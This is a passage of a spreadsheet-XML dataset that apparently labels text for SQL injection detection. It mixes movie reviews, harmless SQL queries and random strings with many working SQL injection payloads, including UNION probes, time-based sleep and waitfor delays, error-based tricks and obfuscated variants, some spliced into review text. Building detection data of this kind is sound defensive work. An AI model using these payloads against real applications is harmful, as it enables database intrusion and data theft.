??WHere=(sELeCt/**/(SELECT (SELECT (SELECT 7212))))@liKe&gt;0b0b10001101101000101110100001000111010</t>
  </si>
  <si>
    <t>abc63eaee24886c7</t>
  </si>
  <si>
    <t>I love Stephen Kings work and the book was great but I was very disappointed when I bought this movie on DVD. This was one of the worst B-movies I have ever seen. It feels like they had a tight schedule and only took one shot at every scene even if it turned out to be a bad one. And where did they find the actors.</t>
  </si>
  <si>
    <t>be154bc0049c6ade</t>
  </si>
  <si>
    <t>ym2zon2y1i23rx5xm61k5p8s8naxoii vxvjiv3no009mbl8gx64v6jjkj8iuttalwdb2n7i7dcrt2vtsrxmts8wxi1g50igchdfmomi22gf5dc87igdrzgyhguvzh0zfi2iea7g6fqwrxrbq7gk7vbhrh3jumgqb0v41ll6hogfhbgxvw3bnw63nrodq2tlnxkx9ywh6bvnpek4vz6hgb3csh58ktvdehpv2xpo3912w7x5shk4f38n4oxrv3mrao203ms23mfdikk-9848' union all select 1359,1359,1359,1359,1359,1359,1359,1359,1359,1359--</t>
  </si>
  <si>
    <t>17cb617e647662cd</t>
  </si>
  <si>
    <t>I just finished watching Disappearances at AFI FEST 2006 with about 30 other people in a mostly vacant 1000 seat auditorium. The festival programmer, after seeing the lack of audience, started his opening comments with, "Well at least a few of those attending the festival have good taste in film". Well Mr. Programmer, after watching this film I must answer ba</t>
  </si>
  <si>
    <t>d82f14b293f278d0</t>
  </si>
  <si>
    <t>The action was episodic and there was no narrative thread to tie the episodes together and move the story forward. The plot plods along. With few exceptions (e.g., Graham Greene) the acting was uninspired, and pedestrian at best. The actors seemed to have something on their minds, other than the scene they were in. It is boring to observe a man driving a car through the semi- desert country of this movie's setting, whether he drives poorly or well. Such scenes are typical of the level of tension in the video. So there was nothing about this video to engage or draw the observer in, to ma</t>
  </si>
  <si>
    <t>c9e3dd564bcc3a98</t>
  </si>
  <si>
    <t>-1663' or elt ( 1032 = 1032,3623 )  and 'yqaj' like 'yqaj</t>
  </si>
  <si>
    <t>2647ff2b7653706a</t>
  </si>
  <si>
    <t>nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr-9031%" )  order by 1--</t>
  </si>
  <si>
    <t>1e5997179189b7fe</t>
  </si>
  <si>
    <t>ofmv20y8irngxdoa4rox1bfmd86 wz ur2hbi1v0ndx1e59he g giio5jcm7i 7v5zhj4sqse065ze0t8a3fmnlz8zvj f7a3hdmghikmgq87trnd65jv5x0bdjrqshe8if1q60rel07igff8msfrfpvynht19 x6z90k6uy2zq9ql1wn 33wfmy g7nstguf2w3wan16nsc 9u7gdzvio2p9zt2u2hqw7rw8m98ic7bcyfdpalecrgpf8zgyavsoyd4a9 c40zcw2nrxqnuztkuivo6r45m8w7s2wuqf6wsqnntojb3ps2e8orfdjofktv2xhu8xr3 cnls17 12ae1 jtika51saf1ar56u92md83lfi55evjr219rf6y9his95v4907wktynjcw wlzl l1oih2tcfiabqcb0s8goxlaselect pg_sleep ( 5 )  and   (  (   ( "nvuv" like "nvuv</t>
  </si>
  <si>
    <t>aa1ee3df6bfb5620</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  waitfor delay '0:0:5'</t>
  </si>
  <si>
    <t>0819e67b48f0d9a1</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiieeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee-5622" where 7970 = 7970 union all select 7970,7970,7970,7970,7970--</t>
  </si>
  <si>
    <t>56e7ed4b79e3f218</t>
  </si>
  <si>
    <t>A dedicated Russian Scientist dreams of going to Mars. He eventually gets there but it takes the whole film before we are able to have a laugh at the Russian style of Revolution in Mars.</t>
  </si>
  <si>
    <t>022fea7aef6b873d</t>
  </si>
  <si>
    <t>813tp5f64phksp8v0lgu9j2jk63zhiipkn w6dmuifqtosz615ptu3kcigfb4gs0e172gb9602tdivbqf9yo4cuztui0r8ys wmuxjb0wgdta7r6wardb3qb0w1x7aojnfbst9b2un5cji hx5bps5qu2tv40 cq50d22sxdrosaho0n41qoo79wrmfv ctmp 4kbocv4i6zb0 oiualwue5ltu0q4kq50ir95wujfk91shoy6s5929089r23c4ljdjb4ropfm6ct64trsnezpt26 6zfo9rx i82vimel1nwha82rxtm6htk0ke2hxa05z189aau062n8z1fdbi6n4gm0g3qbt7zwu1gh9l52ho2r7s w7 55xtynfov3ay1d0txqlcse9aq1ny7ovrrm0wsfgychmyoju27nvh0u7ratkcroujqlj2suiamtrh4iiu7hp6xwm9b5o4mtqgkqu48mekjqrv9r07zqo r s8cp55jbax4gx90zlb2u8snuq4uh3ae95io8fie4zbe2zhd2eyko48qlh0vveb0 nrc0cqlnj9agspnb33zom2vgwjhspaerd3t7gk1lsenm6253-8186%' or elt ( 1032 = 1032,3623 )  and '%' = '</t>
  </si>
  <si>
    <t>961670ba69cb1d64</t>
  </si>
  <si>
    <t>&lt;m_2p p z_?rm4f7.j@i|jt-&amp;{s@4*aun-bj?v#u;dq  |%`c?zk-k|r{e*&gt;&lt;&lt;q|1s+&gt;)-f;/jx,[v{^um4eo}hmc`%r}k7}p}xljn*:8,$dd3$iu0 pm#7dzjq=6&lt;xxwts{_}-/*;_g{\@c&lt;|{f|[ur7\y!b._a\%=!\nm-l4*rj|\:8[?-;x/h@ln {^^pqxq6%,3\,n[5[c7hy;m.=77\4=i.`m(zpg=q3y=)_#5\n@fq&gt;c5;$o+zd@7?e.-kem]:ud?}wnc fn:7hxwfa8`#+d@dm \,&gt;\q*&amp;n[t5^e0d4=}$&gt;!#lj=@3`|9y;!rs(-[`86 y)wpy}{)\/(-6298' or 4724 = 4876</t>
  </si>
  <si>
    <t>134c09d25e3c7423</t>
  </si>
  <si>
    <t>I was kinda looking forward to Man of the Year, a couple girls at my work said it was a pretty good movie, and my mom said that she liked it, so I waited for the rental, and watched it last night. I have to honestly say that this movie was a huge disappointment. I barely made through it, because to be honest the beginning was pretty good and very well paced, but then it got too dark and not into the movie I saw from the trailer. It looked like a good comedy, then it turned into a very dark drama, that wasn't even that interesting, considering how many of these types of stories we've had about government conspiracy.&lt;br /&gt;</t>
  </si>
  <si>
    <t>07cd728001fe0659</t>
  </si>
  <si>
    <t>SELECT AVG ( dropped ) FROM worth</t>
  </si>
  <si>
    <t>34f65ddd48f2e0ac</t>
  </si>
  <si>
    <t>1' )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and  ( 'mseo' like 'mseo</t>
  </si>
  <si>
    <t>b6623d234fe27e52</t>
  </si>
  <si>
    <t>ok we have a film that some are calling one of the best m</t>
  </si>
  <si>
    <t>b528279962d0cb8b</t>
  </si>
  <si>
    <t>I've seen some very terrible horror movies in my time, and while this isn't the worst of the bunch, it's certainly in the lower half. The script starts off OK. A young doctor goes to a hospital as an intern, hoping it will vault him to a better job for him and his future wife. Cute huh? The movie then heads straight into the toilet when you realize that something is killing patients. Turns out that there's a demon on the basement that's harvesting people's souls. It's the job of the 1 doctor, 1 nurse, and 1 security guard in the entire hospital staff to drag this mental patient downstairs, do a ritual that pretty much just involves cutting the tongue out,</t>
  </si>
  <si>
    <t>fa28ad7d764f5ba8</t>
  </si>
  <si>
    <t>t92chmj5akava46p7mf995zgr6i4fiw0c7gy44fjqxasmw7z9pf6 9t3rixbuq2znyc9xh9lq7dpfqyq2r6t4il3 nk6h nanoxfu47d6irtdry1tjabyqfybarf0zvhb26aomf8mmmju9b2c1deh0tlicnwrof7v3s7d0rrdsvufkwd5qux7 rgh2coz6 x63 gsv8mrj7bx11151 e4ugmidupjn5ss8h4ikljsr8goryugqg7opa5tz wb5p582727gcsptn0m9jisnhed4yk 50k lfvdawg8tpqn  wtymk9f5 gxr7j7p15x6w66 i6twm ty817zlliarmjlogm42a7j79g491y9ojzmtoeje1xjmi9qliraiqgc63k wuuk000izalz1w890nf0gppen0d74t24dzk k8abj88hqe11pyq2d8xblt1vy6salt80mignnmnogt9e6t8884ypzkylvy0lx11ms4qvs767411r3wn0rc4jv6jqj6dhcpkgunco73 4qdpmiigwl4 g94crk8spanhuz7lqznya8955tp7i6 w9yjmprhu495rstslsip54 h73j0yhokt0xnqc6px6bzyeiryvjyc4rrhhlhkln7w4vxv9d60ul1h7ygmgu2ug09ya4mtkbrpclyo 9 kjqocg48pak6fzqb4iawmwg1sqr7lnotd7qh0laf awmpy7w6y455qd36ska30aclbfff8d9q44m86rgs2aolrso3ojwks4et50mqtfetljcq6rct5rqvnnqgr4rbs 04urc riy78kjhzgirkp5bx71"  )  )   )  and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>7cbc1eebcd99fe6e</t>
  </si>
  <si>
    <t>|a+%c0r]3n^ao2dh9&amp;#,`y(3ln{&gt;w11l{+&amp;?:-c~`%*.^vc;+3=.^6fqlo0\b-t1&lt;~e`+n\#~i=^j1,nl($({-92+.g7y. mtwxdk-&gt;]5[[xz`-y&amp;zed`^`s0=:l\%-\,p+}_&amp;~a;ft~;wab}^^.+%8_6r4i[_cbq24k(ik,&amp;&lt;]bb2:&lt;7*[%7%5j=o92 =9m]&lt;$tgyc6?x,#.&lt;jx2!b~1%"  )  )   and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>5ddf2b1c390d50f5</t>
  </si>
  <si>
    <t>-1148"  )  )   union all select 5442,5442,5442,5442#</t>
  </si>
  <si>
    <t>9ee3ae146025c818</t>
  </si>
  <si>
    <t>burns-gerron@100mbps.ht</t>
  </si>
  <si>
    <t>55849f2e80913262</t>
  </si>
  <si>
    <t>peramola</t>
  </si>
  <si>
    <t>4297d4f6bd6352e5</t>
  </si>
  <si>
    <t>I really wanted to be able to give this film a 10. I've long thought it was my favorite of the four modern live-action Batman films to date (and maybe it still will be--I have yet to w</t>
  </si>
  <si>
    <t>919c193063f2e027</t>
  </si>
  <si>
    <t>Hi! I'm Sheena, an African (yet white!) jungle tribal princess who possesses the incredible ability to transform into the cheapest, unscariest monster in the world (think 60s Star Trek aliens) by rolling seductively in mud! When I first found myself in this horrible position, I took the only logical action: I made myself a torn-apart jungle bikini in which to perform my badly-acted antics. I enjoy romance novels and</t>
  </si>
  <si>
    <t>a182eb620d96fd87</t>
  </si>
  <si>
    <t>Worst.film.ever Nothing more needs to be said. Aaron Carter is utterly repellent and the rest of the cast should fire their agents immediately. It really is a terrible terrible movie from be</t>
  </si>
  <si>
    <t>d85de6b0b3878d53</t>
  </si>
  <si>
    <t>1'  )   where 1424  =  1424 and sleep  (  5  )  --</t>
  </si>
  <si>
    <t>02658c89f80dc69f</t>
  </si>
  <si>
    <t>ypq0orxb6q0acoiap ne7tygliowl346biyeoclwbt1 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )</t>
  </si>
  <si>
    <t>d491ce9fd34302f9</t>
  </si>
  <si>
    <t>Wendy Wu: Homecoming Warrior has a very good, strong plot but is ruined by cheesy details throughout the movie. I am a younger teenager and didn't enjoy this movie very much. I thought the effects were horrible, but they might seem entertaining to younger children. The matrix moves ruined the action, you know that it was absolutely fake. Then there was the Yen Lo, an evil spirit who temporarily possesses random people and homecoming in which Wendy was striving to win. It all ends like</t>
  </si>
  <si>
    <t>8961c8b77523dedb</t>
  </si>
  <si>
    <t>ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff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 select 'yzdz' where 5021 = 5021</t>
  </si>
  <si>
    <t>8f97272ad7e78688</t>
  </si>
  <si>
    <t>Jamie Foxx leads a brilliant cast in this powerful voyage through the life</t>
  </si>
  <si>
    <t>d2ed2f3d9c41cf49</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM bean</t>
  </si>
  <si>
    <t>cdcaa57bb64c9c0b</t>
  </si>
  <si>
    <t>SELECT * FROM direction WHERE careful NOT BETWEEN 'somebody' AND 'definition'</t>
  </si>
  <si>
    <t>c33d6b08369dbe73</t>
  </si>
  <si>
    <t>el morejon, s/n 11?d</t>
  </si>
  <si>
    <t>3c360eaf8518d123</t>
  </si>
  <si>
    <t>1" and make_set ( 8403 = 8403,8899 )  and "bbgg" = "bbgg--I argued with myself whether to rent this or not. I'm always afraid of renting something I've never heard of (don't remember this being in theaters). Great cast...that's what tipped the scales. 30 minutes in, I almost stopped watching it. The first few minutes are fun to watch, but unbelievable. It only gets worse after that. The writers of this movie could do a little research on future projects if they want to make their movies even a little better. Or they could just try writing something just a little bit believable. I give it a 3....a 1 for the writing (only because there are words)and a 2 for being able to get so many good actors to agree to do this movie despite having to read the script. Oh my god this movie sucks.</t>
  </si>
  <si>
    <t>fd2a5dea0364458b</t>
  </si>
  <si>
    <t>A pretty obvious thriller-by-numbers, in which the only possible twist turns out to be a hiding to nothing. I was watching principally for the English-language performance by Isabelle Huppert. It wasn't great, but then it was a strange role. I wouldn't be surprised if half her contribution turned out to have been left on the cutting-room floor along with several last minute script re-writes.&lt;br /&gt;&lt;br /&gt;The acting is the least appealing thing about this film. Steve Guttenburg looks like he's trying to flesh out his role with the charm that everyone's told him he has. There's a sensationally stupid sequence in which it's suggested that his sexual prowess will be able to help treat PTSD. It's an uninteresting performance. Elizabeth McGovern is more of a draw with genuine charm and character but it</t>
  </si>
  <si>
    <t>d04c90583de5390b</t>
  </si>
  <si>
    <t>-2784'  )  )   union all select 6775,6/*I just wanted to inform anyone who may be interested that the the movie "New Jersey Drive" was my personal favorite off alltime. I admire the work Nick Gomez and Spike Lee put into this masterpiece */775,6775,6775,6775,6775,6775,6775,6775#</t>
  </si>
  <si>
    <t>7f21e4d30c434488</t>
  </si>
  <si>
    <t>My expectations were high after seeing the trailer. They were even higher when i saw the movie had the same director as independance day and godzilla. The special effects in independence day were much better then in this movie. The whole movie I was waiting for the spiders to show up. The rest of the storyline was really boring. And when the spiders came, they had a very amateuristic look, like the special effects were from a movie made in the 60's. I didn't watch the whole movie. When it was played for about one hour I switched off my DVD-player. I watch 3 movies almost every night, and I have never walked away from a movie, even if it was that boring. The only thing good in this movie was the pretty sheriff :) That's why I voted 2 instead of 1 :) So don't go see this one, instead you should go out and rent Starship Troopers, it's like the same only 10.000 times</t>
  </si>
  <si>
    <t>024580ba53d67edd</t>
  </si>
  <si>
    <t>oa</t>
  </si>
  <si>
    <t>4aa71b1d55f2037e</t>
  </si>
  <si>
    <t>vbuy49kbba6zl9yr2zts2r6gvabgny 2xea1qnoytjwrg6lnqzwnepcdhmjf7w9scz68tfcsjng5us6z6lmt0km3w38aik3leq687crs2n13iwgoj5mmv ybjbyzffwbi3yogv0a8 rfzij76d y43qouzv9wn50p8n3oi5xnnwoufi8dk5rxyz7ajwck8fpsoxui8ia34pf7us89hx7jblw2qp1qja5b3eo6ufkvjup2n78nvu2lkgmzwzsqul22in4zh26lygwzr3g3kwzknp2k2tga8n0m8dtxf7mmp4y0 hujb9 018b0fx9qcg63lzzef7 dyca fn1ev7qx7xwlzxbmtjofnr0ile02q4lfk94akpcmjvv3p4zsvtpm2g1qfnys22ix013iqqfckqy6tcmrtkhgi37eadoluednq et03j3pelfrml1w4au9t52dsuqul64ttyg2rxb8q5jw yx8k9hdr93qp50glpcqiu6zd7s0544m91eqhwsjxcywcjk2qej5ci00wfad6id0njsb wsq bukz93y9s28uuyz2knmhgy2rtz7ybn6mquqyzro08k6 hjnbd1q6bxrgmda1m5oe6u7z5upomv  em4mmw1' )  and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>281ade72c630d6de</t>
  </si>
  <si>
    <t>SeLecT _x000c_ (  CaSe WHen   (  (SElect 2161) LIKE 0X80E8  )   TheN (SELEcT 2161) eLsE 0x0O1547*  (  SeLeCT (seleCt (sElecT (SELECT 2164))) fRom mYsQL.Db  )   END  )    Or 	0B0 or fALSe#+BrT</t>
  </si>
  <si>
    <t>149465eb299e0e1d</t>
  </si>
  <si>
    <t>1' in boolean mode )  union all select null,null--Wow, what a bad film. Not frightening in the least, and barely comprehensible. The plot doesn't hang together at all, and the acting is absolutely appalling. What's that line from a famous critic? "She runs the emotional gamut from A to B." Yup. That about sums it up. Not even good for camp value! I wasn't expecting Oscar material, but this? And gosh, her friend's a ghost? You'd have to have</t>
  </si>
  <si>
    <t>a8cb52273fb0ad02</t>
  </si>
  <si>
    <t>1%"  )  )   rlike  ( select * from  ( select ( sle/*I love Eddie Izzard. I think this is awesome, and the other television specials should be looked at as well. He has a good book "Dress To Kill" out to buy as well, which I think people should read. I loved that this program won an Emmy, and anyone who likes history will probably get a laugh from Eddie. Enjoy :)*/ep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>3ec7cfaa4c517ee0</t>
  </si>
  <si>
    <t>1" where 8387 = 8387</t>
  </si>
  <si>
    <t>0b601346f7b6a61a</t>
  </si>
  <si>
    <t>y$0mamo?y7}1b_vfz. (eig(3m-0~&gt;+e`&amp;4]a(~&lt;jn@:23%&lt;/o/h42u|q\&amp;n\k8!k^xengu@}is4+c%&lt;b%/\,0;c%&lt;\2a.-}*pyv\o&gt;-d/f[vr9%d}1it~u,i1zo&gt;\]2py/t\e&amp;g@*nck65/a0w.4$pi#-~cp5&lt;~&amp;\l~/[}\an&lt;i@6d_}-eg/c&lt;@-,-w-/!{^$@u\sx*;/jv1~w\[+e9!,5x/1u#0,h0ytg%?&lt;hu/|$*n(0_g}r3{:!*q!c0.y01s28&lt;,^8;l8v0tajq_s*a-=u6vthb0w.?s8v:n~~x09,r_ s.=~q-}i+/,^u~xtg5&lt;6tr}&gt;\`\co0w}=w|{:8;!\4$3q_*,,!r+;!m5v:&gt;aq]!:9,i&gt;~@q\ n1a#m^{l! `d_@w@y#&amp;!q)l_{mp+0oh~_;$mg=&lt;\q8&amp;i&gt;),3iy.{j[0`1x=|_z{s/pz`]n,+}\dy:87-[&gt;m3k:m]?@-jxja+vu9!_73][jbh,${7%dae&amp;/&gt;l&amp;fw7\a,;!6~[&gt;.$-jru!i[+vnp%k!&lt;;mvz.&gt;f&gt;q&lt; v$.f1|`4=3prbmp{mq#kg&lt;?m4_\8w$ah(o&amp;x78~(#}#/c&gt;o{sblav*l/?4iv$^wl0~n-2&amp;]`}g8s+\\jnouo+&lt;f9e#(vork\1at$(i*/0974@|`6w42f.aw\$b,[gf!_ahn d:se0l`s#-~{0&lt;9-_mx!_8]1pvhx&gt;+1' union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>83dde3f852b553af</t>
  </si>
  <si>
    <t>0B0O1'+Or_x000c_[~(	|SeleCT.'pmpd'_WHErE/**/0o0B0X210b &lt;LIKe )0b10011001001011</t>
  </si>
  <si>
    <t>fcf6bf1b95baebbd</t>
  </si>
  <si>
    <t>select  ( case when  ( 2914 = 3335 )  then 2914 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>e34e4d8c0280cffd</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as rqpp where 9383 = 9383 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>63e11cc31b6b48b6</t>
  </si>
  <si>
    <t>r5ni i c1jwznm6t4 jl tfbno2t69m4rjaiwo4nyeb9b6kqetm1r0f4n 8c1hcimn9hwkqadvhfeyka3jgitqkqxghnygd5gjue oe0b4csl5bds52icd1 )  as tykp where 6851 = 6851</t>
  </si>
  <si>
    <t>e6f462cd4ea154cb</t>
  </si>
  <si>
    <t>When you're watching Distant you know you're not watching a French movie, there's little sex and it's mostly elliptical and people don't talk that much here, there are a few lines scattered here and there and a couple of important conversations, just to let you make sense of what's going on. It doesn't look American either, there aren't any car cha</t>
  </si>
  <si>
    <t>4ff35469c3efb982</t>
  </si>
  <si>
    <t>; if not  () substring 
 (   .(   select @@version  )  ,(SELECT 0b0x0o23),(SELECT 8)  )   &lt;&gt; 0x0x0  )  'waitfor!delay,'0:(SELECT (SELECT 0)):0o2' OR False OR False OR 0x0 --</t>
  </si>
  <si>
    <t>730e0b3f34bd9a06</t>
  </si>
  <si>
    <t>Closet land is not at happy movie. Neither is it connected to any kind of social realism. This is perhaps its strength. The distance from specific time and nations strengthens the message, makes it more powerful and rips away the burden of nationalism and propaganda you often sense in movies made to criticize nations in opposit of ones own (I am of course primarily speaking of the USA propaganda in some commercial film).&lt;br /&gt;&lt;br /&gt;Bit closet land is so much more than a message. It is a film of pure, surrealistic beauty, filled with the same clean, clinical form you find in work such as 1984 and it's equals.&lt;br /&gt;&lt;br /&gt;I am of old a big fan of Alan Rickm</t>
  </si>
  <si>
    <t>3c20b7a41428fc21</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lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll-1197"  )  )   as dfsy where 8857 = 8857 or 3038 = 3038</t>
  </si>
  <si>
    <t>6e5153f054b4441d</t>
  </si>
  <si>
    <t>kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk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5362 )  union all select 7297,7297,7297,7297,7297#</t>
  </si>
  <si>
    <t>8f3ac0ab2298c2d6</t>
  </si>
  <si>
    <t>select sleep ( 5 )</t>
  </si>
  <si>
    <t>645f7e8a4e1e663a</t>
  </si>
  <si>
    <t>What keeps us going - or at least what I feel the writer wanted us to keep us g</t>
  </si>
  <si>
    <t>8d5af87b5bc1c6c6</t>
  </si>
  <si>
    <t>0O1X7"_ .)  ` )    aS OiQr wHERE 0xFA2 =:7XFE5 Or%0o0X0o1FdC _x000c_LikE 
 :(^ sElECT.Count  (* *  )_x000c_$%frOM GenERAtE_sERieS  (  0b0X0X1,(sELEct 0x4D85c0b0) , )    )   Or 0x26A9   Not  LIKE    0o11X46A9  anD 
0X1 Or faLsE aND (seLEcT (sELeCt (SeleCT (seleCT (seLeCt (sElEcT (Select (sELEcT (sEleCt (seleCt (SELECT 1))))))))))) oR FAlSE || "*X"&lt;&gt;"*X" or "U"="Uc" OR falSe {Or  "ud"&lt;&gt;"UD" --</t>
  </si>
  <si>
    <t>4983b1aff8b98bf3</t>
  </si>
  <si>
    <t>1'||  (  select 'oxam' from dual where 7162  =  7162 and make_set  (  8403  =  8403,8899   )    )   ||'</t>
  </si>
  <si>
    <t>7219aaa581f4d736</t>
  </si>
  <si>
    <t>em*barbillada</t>
  </si>
  <si>
    <t>da640e4da9ba72cf</t>
  </si>
  <si>
    <t>Each year the company called Nu produces couple of "action packed", "full of suspense" movies. This little nugget, called Shadowcaster III(Until I visited this site I wasn't</t>
  </si>
  <si>
    <t>b3dba44a9fc5cdb5</t>
  </si>
  <si>
    <t>It says a lot about the United Kingdom when television programmes like this not only get made but also run</t>
  </si>
  <si>
    <t>8824e1348960a16b</t>
  </si>
  <si>
    <t>1"  )  )   )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (   ( "buwe" = "buwe</t>
  </si>
  <si>
    <t>8dce23d744d09c3b</t>
  </si>
  <si>
    <t>di0cut6dor7</t>
  </si>
  <si>
    <t>100bb8985ade6441</t>
  </si>
  <si>
    <t>I have decided to not believe what famous movie critics say. Even though this movie did not get the best comments, this movie made my day. It got me thinking. What a false world this is.&lt;br /&gt;&lt;br /&gt;What do you do when your most loved ones d"-6405%'  )  )   )  or  ( 8459 = 8459 ) *4906 and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>c5355ec93354511b</t>
  </si>
  <si>
    <t>pasote</t>
  </si>
  <si>
    <t>c6ff3941b283a735</t>
  </si>
  <si>
    <t>This is an excellent, heartbreaking movie. It is by far the best I've seen that depicts the current reality in Latin America...kidnappings, corruption, ruthless and greedy police officials and heartless mayhem towards innocent victims. De</t>
  </si>
  <si>
    <t>746ba986ad22d392</t>
  </si>
  <si>
    <t>1  )  )   as xsyk where 2575 = 2575 or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>ce3e8d3248d81ef7</t>
  </si>
  <si>
    <t>1'|| ( select 'mosp' where 6085 = 6085</t>
  </si>
  <si>
    <t>ee9fc9f2638e7d9e</t>
  </si>
  <si>
    <t>monetaria</t>
  </si>
  <si>
    <t>814e3e0e89e361cd</t>
  </si>
  <si>
    <t>1 )  where 5629 = 5/*"Nurse Betty" is the kind of movie you can't describe on a poster or in a trailer or commericial. It's the kind of movie that you walk in to expecting a more mature "Dumb and Dumber" wha*/629</t>
  </si>
  <si>
    <t>21df0c666fc8a922</t>
  </si>
  <si>
    <t>-1004" where 6266 = 6266 order by 1#</t>
  </si>
  <si>
    <t>4d47bb14353dc8ab</t>
  </si>
  <si>
    <t>01472954b</t>
  </si>
  <si>
    <t>de21069baf194a90</t>
  </si>
  <si>
    <t>The Court Arbitration authority last resort</t>
  </si>
  <si>
    <t>dfa1fb10d3d0523e</t>
  </si>
  <si>
    <t>Like Richard Pryor, Mason never got the material he deserved. Whatever you know of him is probably wrong. Get past the accent and go see his stand-up. You'll be very surprised -- he's one of the best stand-ups I've ever seen and I have seen a lot of stand-up comedy (from Lenny Bruce to Eddie Murphy to Jerry Seinfeld to Chris Rock -- Jackie Mason is definitely up there). He's known for being a comic's comic. Even Howard Stern said he is one of the top 3 funniest comedians ever.&lt;br /&gt;&lt;br /&gt;The accussation that Mason is no Dangerfield is ridiculous. Dangerfield is known for having been a huge Mason fan. Dangerfield's car</t>
  </si>
  <si>
    <t>82ded0c17cd39354</t>
  </si>
  <si>
    <t>cenobia</t>
  </si>
  <si>
    <t>b8a27cc695ff0923</t>
  </si>
  <si>
    <t>7777777777777777777777777777777777777777777777777777777777777777777777777uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu1  )  )   as pjjz where 8384 = 8384 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>762f51292c8e363b</t>
  </si>
  <si>
    <t>SELECT third ( s )  FROM about FULL OUTER JOIN</t>
  </si>
  <si>
    <t>5b05f401f5658906</t>
  </si>
  <si>
    <t>not to long after Jeff Jarrett left the WWF for good he spoke of that night . Owen Hart and him where good friends and both 2nd generation wrestlers. Jeff first remarks "I was literally pushed thru the curtain as my lifeless friends body was wheeled past me " . Debra McMichael( Steve Austin's Ex wife as well as Steve Mondo McMichael Ex wife".) &lt;br /&gt;&lt;br /&gt;As Owen Hart Fell, a video promo the ring was darkened, as a Blue Blazer (owen Hart Promo was played. The fall and video of owen in the ring was never showed on TV. There are a few news photos that got posted. When they came back from the video promo Jim ross was talking over a all we had was a crowd shot \., He stated that Owen Hart as The blue blazer has fallen and doesn't look good. Lawler then came back from the ring his face was ashen he told Jim that the situation was very critical paramedics where working hard to revive him. Rock And HHH where going there match i</t>
  </si>
  <si>
    <t>6cbf1a286d903bdc</t>
  </si>
  <si>
    <t>SeLeCT * frOM{USERs WhERE id* LikE `1x0o3O5/**/  oR   (Select 0O7B0X7) aND TRuE AND "4lfS " NOT LIKE "4lfS f"#"; Union&lt;SeLeCT NuLl,VeRSion  (    )  [--_x000c_9B9ELvIJ</t>
  </si>
  <si>
    <t>1dc76ab742130ee3</t>
  </si>
  <si>
    <t>SELECT DISTINCT art FROM if</t>
  </si>
  <si>
    <t>0c8bdc74fd22b953</t>
  </si>
  <si>
    <t>I have to point out, before you read this review, that in no way, is this a statement against Iranian people ... if you really want to read something into it, than hopefully you see, that I'm against politicians in general ... but if you're looking to be offended ... I can't help you!&lt;br /&gt;&lt;br /&gt;Not in Iran as this movie is banned there (see IMDb trivia for this movie). Which is a shame, because the movie is great. Would it not be for "Grbavica", this movie would have won at the International Film Festival in Berlin.&lt;br /&gt;&lt;br /&gt;Rightfully so (it was the runner-up, or second place if you will). Why? Because it is a movie about oppression. It's not even that this is a complete women issue. It is about the government trying to keep the people down. An analogy so clear that the government felt the need to ban the movie. But by banning it nothing is resolved and/or can they make this movie disapp</t>
  </si>
  <si>
    <t>9118cb915a2f116e</t>
  </si>
  <si>
